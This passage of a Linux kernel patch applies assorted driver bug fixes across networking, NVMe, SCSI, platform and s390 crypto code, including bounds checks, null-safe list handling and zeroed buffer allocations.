+index 5bb2c098bf4df..685fb4703ee1f 100644
+--- a/drivers/net/bonding/bond_options.c
++++ b/drivers/net/bonding/bond_options.c
+@@ -1210,9 +1210,9 @@ static int bond_option_arp_ip_targets_set(struct bonding *bond,
+ 	__be32 target;
+ 
+ 	if (newval->string) {
+-		if (!in4_pton(newval->string+1, -1, (u8 *)&target, -1, NULL)) {
+-			netdev_err(bond->dev, "invalid ARP target %pI4 specified\n",
+-				   &target);
++		if (strlen(newval->string) < 1 ||
++		    !in4_pton(newval->string + 1, -1, (u8 *)&target, -1, NULL)) {
++			netdev_err(bond->dev, "invalid ARP target specified\n");
+ 			return ret;
+ 		}
+ 		if (newval->string[0] == '+')
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+index 3a2bfaad14065..5136d1e161181 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+@@ -124,6 +124,7 @@ static const struct kvaser_usb_driver_info kvaser_usb_driver_info_leaf_err_liste
+ 
+ static const struct kvaser_usb_driver_info kvaser_usb_driver_info_leafimx = {
+ 	.quirks = 0,
++	.family = KVASER_LEAF,
+ 	.ops = &kvaser_usb_leaf_dev_ops,
+ };
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index dc4ff8a6d0bf5..4938550a67c02 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -131,8 +131,8 @@ struct mii_bus *mv88e6xxx_default_mdio_bus(struct mv88e6xxx_chip *chip)
+ {
+ 	struct mv88e6xxx_mdio_bus *mdio_bus;
+ 
+-	mdio_bus = list_first_entry(&chip->mdios, struct mv88e6xxx_mdio_bus,
+-				    list);
++	mdio_bus = list_first_entry_or_null(&chip->mdios,
++					    struct mv88e6xxx_mdio_bus, list);
+ 	if (!mdio_bus)
+ 		return NULL;
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
+index dd5945c4bfec2..375ad57fca9b4 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
+@@ -1262,7 +1262,7 @@ enum {
+ 
+ struct bnx2x_fw_stats_req {
+ 	struct stats_query_header hdr;
+-	struct stats_query_entry query[FP_SB_MAX_E1x+
++	struct stats_query_entry query[FP_SB_MAX_E2 +
+ 		BNX2X_FIRST_QUEUE_QUERY_IDX];
+ };
+ 
+diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c
+index db8e06157da29..cbd8357c61edc 100644
+--- a/drivers/net/ethernet/intel/e1000e/netdev.c
++++ b/drivers/net/ethernet/intel/e1000e/netdev.c
+@@ -6369,49 +6369,49 @@ static void e1000e_s0ix_entry_flow(struct e1000_adapter *adapter)
+ 		mac_data |= E1000_EXTCNF_CTRL_GATE_PHY_CFG;
+ 		ew32(EXTCNF_CTRL, mac_data);
+ 
+-		/* Enable the Dynamic Power Gating in the MAC */
+-		mac_data = er32(FEXTNVM7);
+-		mac_data |= BIT(22);
+-		ew32(FEXTNVM7, mac_data);
+-
+ 		/* Disable disconnected cable conditioning for Power Gating */
+ 		mac_data = er32(DPGFR);
+ 		mac_data |= BIT(2);
+ 		ew32(DPGFR, mac_data);
+ 
+-		/* Don't wake from dynamic Power Gating with clock request */
+-		mac_data = er32(FEXTNVM12);
+-		mac_data |= BIT(12);
+-		ew32(FEXTNVM12, mac_data);
+-
+-		/* Ungate PGCB clock */
+-		mac_data = er32(FEXTNVM9);
+-		mac_data &= ~BIT(28);
+-		ew32(FEXTNVM9, mac_data);
+-
+-		/* Enable K1 off to enable mPHY Power Gating */
+-		mac_data = er32(FEXTNVM6);
+-		mac_data |= BIT(31);
+-		ew32(FEXTNVM6, mac_data);
+-
+-		/* Enable mPHY power gating for any link and speed */
+-		mac_data = er32(FEXTNVM8);
+-		mac_data |= BIT(9);
+-		ew32(FEXTNVM8, mac_data);
+-
+ 		/* Enable the Dynamic Clock Gating in the DMA and MAC */
+ 		mac_data = er32(CTRL_EXT);
+ 		mac_data |= E1000_CTRL_EXT_DMA_DYN_CLK_EN;
+ 		ew32(CTRL_EXT, mac_data);
+-
+-		/* No MAC DPG gating SLP_S0 in modern standby
+-		 * Switch the logic of the lanphypc to use PMC counter
+-		 */
+-		mac_data = er32(FEXTNVM5);
+-		mac_data |= BIT(7);
+-		ew32(FEXTNVM5, mac_data);
+ 	}
+ 
++	/* Enable the Dynamic Power Gating in the MAC */
++	mac_data = er32(FEXTNVM7);
++	mac_data |= BIT(22);
++	ew32(FEXTNVM7, mac_data);
++
++	/* Don't wake from dynamic Power Gating with clock request */
++	mac_data = er32(FEXTNVM12);
++	mac_data |= BIT(12);
++	ew32(FEXTNVM12, mac_data);
++
++	/* Ungate PGCB clock */
++	mac_data = er32(FEXTNVM9);
++	mac_data &= ~BIT(28);
++	ew32(FEXTNVM9, mac_data);
++
++	/* Enable K1 off to enable mPHY Power Gating */
++	mac_data = er32(FEXTNVM6);
++	mac_data |= BIT(31);
++	ew32(FEXTNVM6, mac_data);
++
++	/* Enable mPHY power gating for any link and speed */
++	mac_data = er32(FEXTNVM8);
++	mac_data |= BIT(9);
++	ew32(FEXTNVM8, mac_data);
++
++	/* No MAC DPG gating SLP_S0 in modern standby
++	 * Switch the logic of the lanphypc to use PMC counter
++	 */
++	mac_data = er32(FEXTNVM5);
++	mac_data |= BIT(7);
++	ew32(FEXTNVM5, mac_data);
++
+ 	/* Disable the time synchronization clock */
+ 	mac_data = er32(FEXTNVM7);
+ 	mac_data |= BIT(31);
+@@ -6503,33 +6503,6 @@ static void e1000e_s0ix_exit_flow(struct e1000_adapter *adapter)
+ 	} else {
+ 		/* Request driver unconfigure the device from S0ix */
+ 
+-		/* Disable the Dynamic Power Gating in the MAC */
+-		mac_data = er32(FEXTNVM7);
+-		mac_data &= 0xFFBFFFFF;
+-		ew32(FEXTNVM7, mac_data);
+-
+-		/* Disable mPHY power gating for any link and speed */
+-		mac_data = er32(FEXTNVM8);
+-		mac_data &= ~BIT(9);
+-		ew32(FEXTNVM8, mac_data);
+-
+-		/* Disable K1 off */
+-		mac_data = er32(FEXTNVM6);
+-		mac_data &= ~BIT(31);
+-		ew32(FEXTNVM6, mac_data);
+-
+-		/* Disable Ungate PGCB clock */
+-		mac_data = er32(FEXTNVM9);
+-		mac_data |= BIT(28);
+-		ew32(FEXTNVM9, mac_data);
+-
+-		/* Cancel not waking from dynamic
+-		 * Power Gating with clock request
+-		 */
+-		mac_data = er32(FEXTNVM12);
+-		mac_data &= ~BIT(12);
+-		ew32(FEXTNVM12, mac_data);
+-
+ 		/* Cancel disable disconnected cable conditioning
+ 		 * for Power Gating
+ 		 */
+@@ -6542,13 +6515,6 @@ static void e1000e_s0ix_exit_flow(struct e1000_adapter *adapter)
+ 		mac_data &= 0xFFF7FFFF;
+ 		ew32(CTRL_EXT, mac_data);
+ 
+-		/* Revert the lanphypc logic to use the internal Gbe counter
+-		 * and not the PMC counter
+-		 */
+-		mac_data = er32(FEXTNVM5);
+-		mac_data &= 0xFFFFFF7F;
+-		ew32(FEXTNVM5, mac_data);
+-
+ 		/* Enable the periodic inband message,
+ 		 * Request PCIe clock in K1 page770_17[10:9] =01b
+ 		 */
+@@ -6586,6 +6552,40 @@ static void e1000e_s0ix_exit_flow(struct e1000_adapter *adapter)
+ 	mac_data &= ~BIT(31);
+ 	mac_data |= BIT(0);
+ 	ew32(FEXTNVM7, mac_data);
++
++	/* Disable the Dynamic Power Gating in the MAC */
++	mac_data = er32(FEXTNVM7);
++	mac_data &= 0xFFBFFFFF;
++	ew32(FEXTNVM7, mac_data);
++
++	/* Disable mPHY power gating for any link and speed */
++	mac_data = er32(FEXTNVM8);
++	mac_data &= ~BIT(9);
++	ew32(FEXTNVM8, mac_data);
++
++	/* Disable K1 off */
++	mac_data = er32(FEXTNVM6);
++	mac_data &= ~BIT(31);
++	ew32(FEXTNVM6, mac_data);
++
++	/* Disable Ungate PGCB clock */
++	mac_data = er32(FEXTNVM9);
++	mac_data |= BIT(28);
++	ew32(FEXTNVM9, mac_data);
++
++	/* Cancel not waking from dynamic
++	 * Power Gating with clock request
++	 */
++	mac_data = er32(FEXTNVM12);
++	mac_data &= ~BIT(12);
++	ew32(FEXTNVM12, mac_data);
++
++	/* Revert the lanphypc logic to use the internal Gbe counter
++	 * and not the PMC counter
++	 */
++	mac_data = er32(FEXTNVM5);
++	mac_data &= 0xFFFFFF7F;
++	ew32(FEXTNVM5, mac_data);
+ }
+ 
+ static int e1000e_pm_freeze(struct device *dev)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 4c0eac83546de..385904502a6be 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5584,6 +5584,11 @@ void mlx5e_priv_cleanup(struct mlx5e_priv *priv)
+ 		kfree(priv->htb_qos_sq_stats[i]);
+ 	kvfree(priv->htb_qos_sq_stats);
+ 
++	if (priv->mqprio_rl) {
++		mlx5e_mqprio_rl_cleanup(priv->mqprio_rl);
++		mlx5e_mqprio_rl_free(priv->mqprio_rl);
++	}
++
+ 	memset(priv, 0, sizeof(*priv));
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+index db578a7e7008a..59fb31201c35e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+@@ -6,6 +6,9 @@
+ #include "helper.h"
+ #include "ofld.h"
+ 
++static int
++acl_ingress_ofld_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport);
++
+ static bool
+ esw_acl_ingress_prio_tag_enabled(struct mlx5_eswitch *esw,
+ 				 const struct mlx5_vport *vport)
+@@ -123,18 +126,31 @@ static int esw_acl_ingress_src_port_drop_create(struct mlx5_eswitch *esw,
+ {
+ 	struct mlx5_flow_act flow_act = {};
+ 	struct mlx5_flow_handle *flow_rule;
++	bool created = false;
+ 	int err = 0;
+ 
++	if (!vport->ingress.acl) {
++		err = acl_ingress_ofld_setup(esw, vport);
++		if (err)
++			return err;
++		created = true;
++	}
++
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_DROP;
+ 	flow_act.fg = vport->ingress.offloads.drop_grp;
+ 	flow_rule = mlx5_add_flow_rules(vport->ingress.acl, NULL, &flow_act, NULL, 0);
+ 	if (IS_ERR(flow_rule)) {
+ 		err = PTR_ERR(flow_rule);
+-		goto out;
++		goto err_out;
+ 	}
+ 
+ 	vport->ingress.offloads.drop_rule = flow_rule;
+-out:
++
++	return 0;
++err_out:
++	/* Only destroy ingress acl created in this function. */
++	if (created)
++		esw_acl_ingress_ofld_cleanup(esw, vport);
+ 	return err;
+ }
+ 
+@@ -299,16 +315,12 @@ static void esw_acl_ingress_ofld_groups_destroy(struct mlx5_vport *vport)
+ 	}
+ }
+ 
+-int esw_acl_ingress_ofld_setup(struct mlx5_eswitch *esw,
+-			       struct mlx5_vport *vport)
++static int
++acl_ingress_ofld_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
+ {
+ 	int num_ftes = 0;
+ 	int err;
+ 
+-	if (!mlx5_eswitch_vport_match_metadata_enabled(esw) &&
+-	    !esw_acl_ingress_prio_tag_enabled(esw, vport))
+-		return 0;
+-
+ 	esw_acl_ingress_allow_rule_destroy(vport);
+ 
+ 	if (mlx5_eswitch_vport_match_metadata_enabled(esw))
+@@ -347,6 +359,15 @@ int esw_acl_ingress_ofld_setup(struct mlx5_eswitch *esw,
+ 	return err;
+ }
+ 
++int esw_acl_ingress_ofld_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
++{
++	if (!mlx5_eswitch_vport_match_metadata_enabled(esw) &&
++	    !esw_acl_ingress_prio_tag_enabled(esw, vport))
++		return 0;
++
++	return acl_ingress_ofld_setup(esw, vport);
++}
++
+ void esw_acl_ingress_ofld_cleanup(struct mlx5_eswitch *esw,
+ 				  struct mlx5_vport *vport)
+ {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c b/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c
+index 83d2dc91ba2c8..99196333d1324 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c
+@@ -1484,6 +1484,7 @@ static int mlxsw_linecard_types_init(struct mlxsw_core *mlxsw_core,
+ 	vfree(types_info->data);
+ err_data_alloc:
+ 	kfree(types_info);
++	linecards->types_info = NULL;
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ntb_netdev.c b/drivers/net/ntb_netdev.c
+index 85dbe7f73e319..535dc5b2901fc 100644
+--- a/drivers/net/ntb_netdev.c
++++ b/drivers/net/ntb_netdev.c
+@@ -119,7 +119,7 @@ static void ntb_netdev_rx_handler(struct ntb_transport_qp *qp, void *qp_data,
+ 	skb->protocol = eth_type_trans(skb, ndev);
+ 	skb->ip_summed = CHECKSUM_NONE;
+ 
+-	if (__netif_rx(skb) == NET_RX_DROP) {
++	if (netif_rx(skb) == NET_RX_DROP) {
+ 		ndev->stats.rx_errors++;
+ 		ndev->stats.rx_dropped++;
+ 	} else {
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 546cbe21aab31..6b5bfdbec8b11 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -254,7 +254,7 @@ mt76_connac_mcu_add_nested_tlv(struct sk_buff *skb, int tag, int len,
+ 	};
+ 	u16 ntlv;
+ 
+-	ptlv = skb_put(skb, len);
++	ptlv = skb_put_zero(skb, len);
+ 	memcpy(ptlv, &tlv, sizeof(tlv));
+ 
+ 	ntlv = le16_to_cpu(ntlv_hdr->tlv_num);
+@@ -1532,7 +1532,7 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 	set_bit(MT76_HW_SCANNING, &phy->state);
+ 	mvif->scan_seq_num = (mvif->scan_seq_num + 1) & 0x7f;
+ 
+-	req = (struct mt76_connac_hw_scan_req *)skb_put(skb, sizeof(*req));
++	req = (struct mt76_connac_hw_scan_req *)skb_put_zero(skb, sizeof(*req));
+ 
+ 	req->seq_num = mvif->scan_seq_num | mvif->band_idx << 7;
+ 	req->bss_idx = mvif->idx;
+@@ -1660,7 +1660,7 @@ int mt76_connac_mcu_sched_scan_req(struct mt76_phy *phy,
+ 
+ 	mvif->scan_seq_num = (mvif->scan_seq_num + 1) & 0x7f;
+ 
+-	req = (struct mt76_connac_sched_scan_req *)skb_put(skb, sizeof(*req));
++	req = (struct mt76_connac_sched_scan_req *)skb_put_zero(skb, sizeof(*req));
+ 	req->version = 1;
+ 	req->seq_num = mvif->scan_seq_num | mvif->band_idx << 7;
+ 
+@@ -2294,7 +2294,7 @@ int mt76_connac_mcu_update_gtk_rekey(struct ieee80211_hw *hw,
+ 		return -ENOMEM;
+ 
+ 	skb_put_data(skb, &hdr, sizeof(hdr));
+-	gtk_tlv = (struct mt76_connac_gtk_rekey_tlv *)skb_put(skb,
++	gtk_tlv = (struct mt76_connac_gtk_rekey_tlv *)skb_put_zero(skb,
+ 							 sizeof(*gtk_tlv));
+ 	gtk_tlv->tag = cpu_to_le16(UNI_OFFLOAD_OFFLOAD_GTK_REKEY);
+ 	gtk_tlv->len = cpu_to_le16(sizeof(*gtk_tlv));
+@@ -2417,7 +2417,7 @@ mt76_connac_mcu_set_wow_pattern(struct mt76_dev *dev,
+ 		return -ENOMEM;
+ 
+ 	skb_put_data(skb, &hdr, sizeof(hdr));
+-	ptlv = (struct mt76_connac_wow_pattern_tlv *)skb_put(skb, sizeof(*ptlv));
++	ptlv = (struct mt76_connac_wow_pattern_tlv *)skb_put_zero(skb, sizeof(*ptlv));
+ 	ptlv->tag = cpu_to_le16(UNI_SUSPEND_WOW_PATTERN);
+ 	ptlv->len = cpu_to_le16(sizeof(*ptlv));
+ 	ptlv->data_len = pattern->pattern_len;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index b2ea539f697f7..65f07cc2acdd4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -395,7 +395,7 @@ mt7915_mcu_add_nested_subtlv(struct sk_buff *skb, int sub_tag, int sub_len,
+ 		.len = cpu_to_le16(sub_len),
+ 	};
+ 
+-	ptlv = skb_put(skb, sub_len);
++	ptlv = skb_put_zero(skb, sub_len);
+ 	memcpy(ptlv, &tlv, sizeof(tlv));
+ 
+ 	le16_add_cpu(sub_ntlv, 1);
+diff --git a/drivers/net/wireless/microchip/wilc1000/hif.c b/drivers/net/wireless/microchip/wilc1000/hif.c
+index 5eb02902e875a..13853fda3e047 100644
+--- a/drivers/net/wireless/microchip/wilc1000/hif.c
++++ b/drivers/net/wireless/microchip/wilc1000/hif.c
+@@ -379,7 +379,8 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 	struct ieee80211_p2p_noa_attr noa_attr;
+ 	const struct cfg80211_bss_ies *ies;
+ 	struct wilc_join_bss_param *param;
+-	u8 rates_len = 0, ies_len;
++	u8 rates_len = 0;
++	int ies_len;
+ 	int ret;
+ 
+ 	param = kzalloc(sizeof(*param), GFP_KERNEL);
+diff --git a/drivers/nfc/virtual_ncidev.c b/drivers/nfc/virtual_ncidev.c
+index 85c06dbb2c449..9fffd4421ad5b 100644
+--- a/drivers/nfc/virtual_ncidev.c
++++ b/drivers/nfc/virtual_ncidev.c
+@@ -121,6 +121,10 @@ static ssize_t virtual_ncidev_write(struct file *file,
+ 		kfree_skb(skb);
+ 		return -EFAULT;
+ 	}
++	if (strnlen(skb->data, count) != count) {
++		kfree_skb(skb);
++		return -EINVAL;
++	}
+ 
+ 	nci_recv_frame(ndev, skb);
+ 	return count;
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index 6cf0ce7aff678..d0154859421db 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -559,7 +559,7 @@ static void nvme_mpath_set_live(struct nvme_ns *ns)
+ 		int node, srcu_idx;
+ 
+ 		srcu_idx = srcu_read_lock(&head->srcu);
+-		for_each_node(node)
++		for_each_online_node(node)
+ 			__nvme_find_path(head, node);
+ 		srcu_read_unlock(&head->srcu, srcu_idx);
+ 	}
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 5ff09f2cacab7..32e89ea853a47 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -824,7 +824,8 @@ static blk_status_t nvme_map_data(struct nvme_dev *dev, struct request *req,
+ 		struct bio_vec bv = req_bvec(req);
+ 
+ 		if (!is_pci_p2pdma_page(bv.bv_page)) {
+-			if (bv.bv_offset + bv.bv_len <= NVME_CTRL_PAGE_SIZE * 2)
++			if ((bv.bv_offset & (NVME_CTRL_PAGE_SIZE - 1)) +
++			     bv.bv_len <= NVME_CTRL_PAGE_SIZE * 2)
+ 				return nvme_setup_prp_simple(dev, req,
+ 							     &cmnd->rw, &bv);
+ 
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index 7b74926c50f9b..d2954406b2297 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -805,6 +805,15 @@ void nvmet_sq_destroy(struct nvmet_sq *sq)
+ 	percpu_ref_exit(&sq->ref);
+ 	nvmet_auth_sq_free(sq);
+ 
++	/*
++	 * we must reference the ctrl again after waiting for inflight IO
++	 * to complete. Because admin connect may have sneaked in after we
++	 * store sq->ctrl locally, but before we killed the percpu_ref. the
++	 * admin connect allocates and assigns sq->ctrl, which now needs a
++	 * final ref put, as this ctrl is going away.
++	 */
++	ctrl = sq->ctrl;
++
+ 	if (ctrl) {
+ 		/*
+ 		 * The teardown flow may take some time, and the host may not
+diff --git a/drivers/platform/x86/toshiba_acpi.c b/drivers/platform/x86/toshiba_acpi.c
+index f10994b94a33a..1a8cb8eb22829 100644
+--- a/drivers/platform/x86/toshiba_acpi.c
++++ b/drivers/platform/x86/toshiba_acpi.c
+@@ -3277,7 +3277,7 @@ static const char *find_hci_method(acpi_handle handle)
+  */
+ #define QUIRK_HCI_HOTKEY_QUICKSTART		BIT(1)
+ 
+-static const struct dmi_system_id toshiba_dmi_quirks[] = {
++static const struct dmi_system_id toshiba_dmi_quirks[] __initconst = {
+ 	{
+ 	 /* Toshiba Portégé R700 */
+ 	 /* https://bugzilla.kernel.org/show_bug.cgi?id=21012 */
+@@ -3312,8 +3312,6 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	struct toshiba_acpi_dev *dev;
+ 	const char *hci_method;
+ 	u32 dummy;
+-	const struct dmi_system_id *dmi_id;
+-	long quirks = 0;
+ 	int ret = 0;
+ 
+ 	if (toshiba_acpi)
+@@ -3466,16 +3464,6 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	}
+ #endif
+ 
+-	dmi_id = dmi_first_match(toshiba_dmi_quirks);
+-	if (dmi_id)
+-		quirks = (long)dmi_id->driver_data;
+-
+-	if (turn_on_panel_on_resume == -1)
+-		turn_on_panel_on_resume = !!(quirks & QUIRK_TURN_ON_PANEL_ON_RESUME);
+-
+-	if (hci_hotkey_quickstart == -1)
+-		hci_hotkey_quickstart = !!(quirks & QUIRK_HCI_HOTKEY_QUICKSTART);
+-
+ 	toshiba_wwan_available(dev);
+ 	if (dev->wwan_supported)
+ 		toshiba_acpi_setup_wwan_rfkill(dev);
+@@ -3624,10 +3612,27 @@ static struct acpi_driver toshiba_acpi_driver = {
+ 	.drv.pm	= &toshiba_acpi_pm,
+ };
+ 
++static void __init toshiba_dmi_init(void)
++{
++	const struct dmi_system_id *dmi_id;
++	long quirks = 0;
++
++	dmi_id = dmi_first_match(toshiba_dmi_quirks);
++	if (dmi_id)
++		quirks = (long)dmi_id->driver_data;
++
++	if (turn_on_panel_on_resume == -1)
++		turn_on_panel_on_resume = !!(quirks & QUIRK_TURN_ON_PANEL_ON_RESUME);
++
++	if (hci_hotkey_quickstart == -1)
++		hci_hotkey_quickstart = !!(quirks & QUIRK_HCI_HOTKEY_QUICKSTART);
++}
++
+ static int __init toshiba_acpi_init(void)
+ {
+ 	int ret;
+ 
++	toshiba_dmi_init();
+ 	toshiba_proc_dir = proc_mkdir(PROC_TOSHIBA, acpi_root_dir);
+ 	if (!toshiba_proc_dir) {
+ 		pr_err("Unable to create proc dir " PROC_TOSHIBA "\n");
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 399b97b54dd0f..029355a2f389d 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -871,6 +871,22 @@ static const struct ts_dmi_data schneider_sct101ctm_data = {
+ 	.properties	= schneider_sct101ctm_props,
+ };
+ 
++static const struct property_entry globalspace_solt_ivw116_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 7),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 22),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1723),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1077),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-globalspace-solt-ivw116.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data globalspace_solt_ivw116_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= globalspace_solt_ivw116_props,
++};
++
+ static const struct property_entry techbite_arc_11_6_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-min-x", 5),
+ 	PROPERTY_ENTRY_U32("touchscreen-min-y", 7),
+@@ -1345,6 +1361,17 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_DATE, "04/24/2018"),
+ 		},
+ 	},
++	{
++		/* Jumper EZpad 6s Pro */
++		.driver_data = (void *)&jumper_ezpad_6_pro_b_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Jumper"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Ezpad"),
++			/* Above matches are too generic, add bios match */
++			DMI_MATCH(DMI_BIOS_VERSION, "E.WSA116_8.E1.042.bin"),
++			DMI_MATCH(DMI_BIOS_DATE, "01/08/2020"),
++		},
++	},
+ 	{
+ 		/* Jumper EZpad 6 m4 */
+ 		.driver_data = (void *)&jumper_ezpad_6_m4_data,
+@@ -1584,6 +1611,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "SCT101CTM"),
+ 		},
+ 	},
++	{
++		/* GlobalSpace SoLT IVW 11.6" */
++		.driver_data = (void *)&globalspace_solt_ivw116_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Globalspace Tech Pvt Ltd"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "SolTIVW"),
++			DMI_MATCH(DMI_PRODUCT_SKU, "PN20170413488"),
++		},
++	},
+ 	{
+ 		/* Techbite Arc 11.6 */
+ 		.driver_data = (void *)&techbite_arc_11_6_data,
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index df0f19e6d9235..17885c9f55cb2 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -1191,7 +1191,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		if (rc)
+ 			break;
+ 		if (copy_to_user(ucs, &kcs, sizeof(kcs)))
+-			return -EFAULT;
++			rc = -EFAULT;
+ 		memzero_explicit(&kcs, sizeof(kcs));
+ 		break;
+ 	}
+@@ -1223,7 +1223,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		if (rc)
+ 			break;
+ 		if (copy_to_user(ucp, &kcp, sizeof(kcp)))
+-			return -EFAULT;
++			rc = -EFAULT;
+ 		memzero_explicit(&kcp, sizeof(kcp));
+ 		break;
+ 	}
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 5748bd9369ff7..f5001fadd5b12 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1355,11 +1355,21 @@ static struct mpi3mr_sas_port *mpi3mr_sas_port_add(struct mpi3mr_ioc *mrioc,
+ 	mpi3mr_sas_port_sanity_check(mrioc, mr_sas_node,
+ 	    mr_sas_port->remote_identify.sas_address, hba_port);
+ 
++	if (mr_sas_node->num_phys > sizeof(mr_sas_port->phy_mask) * 8)
++		ioc_info(mrioc, "max port count %u could be too high\n",
++		    mr_sas_node->num_phys);
++
+ 	for (i = 0; i < mr_sas_node->num_phys; i++) {
+ 		if ((mr_sas_node->phy[i].remote_identify.sas_address !=
+ 		    mr_sas_port->remote_identify.sas_address) ||
+ 		    (mr_sas_node->phy[i].hba_port != hba_port))
+ 			continue;
++
++		if (i > sizeof(mr_sas_port->phy_mask) * 8) {
++			ioc_warn(mrioc, "skipping port %u, max allowed value is %zu\n",
++			    i, sizeof(mr_sas_port->phy_mask) * 8);
++			goto out_fail;
++		}
+ 		list_add_tail(&mr_sas_node->phy[i].port_siblings,
+ 		    &mr_sas_port->phy_list);
+ 		mr_sas_port->num_phys++;
+diff --git a/drivers/scsi/qedf/qedf_io.c b/drivers/scsi/qedf/qedf_io.c
+index 10fe3383855c0..031e605b3f427 100644
+--- a/drivers/scsi/qedf/qedf_io.c
++++ b/drivers/scsi/qedf/qedf_io.c
+@@ -2331,9 +2331,6 @@ static int qedf_execute_tmf(struct qedf_rport *fcport, struct scsi_cmnd *sc_cmd,
+ 	io_req->fcport = fcport;
+ 	io_req->cmd_type = QEDF_TASK_MGMT_CMD;
+ 
+-	/* Record which cpu this request is associated with */
+-	io_req->cpu = smp_processor_id();
+-
+ 	/* Set TM flags */
+ 	io_req->io_req_flags = QEDF_READ;
+ 	io_req->data_xfer_len = 0;
+@@ -2355,6 +2352,9 @@ static int qedf_execute_tmf(struct qedf_rport *fcport, struct scsi_cmnd *sc_cmd,
+ 
+ 	spin_lock_irqsave(&fcport->rport_lock, flags);
+ 
++	/* Record which cpu this request is associated with */
++	io_req->cpu = smp_processor_id();
++
+ 	sqe_idx = qedf_get_sqe_idx(fcport);
+ 	sqe = &fcport->sq[sqe_idx];
+ 	memset(sqe, 0, sizeof(struct fcoe_wqe));
+diff --git a/drivers/spi/spi-cadence-xspi.c b/drivers/spi/spi-cadence-xspi.c
+index d28b8bd5b70bc..b8bed8f39d2ae 100644
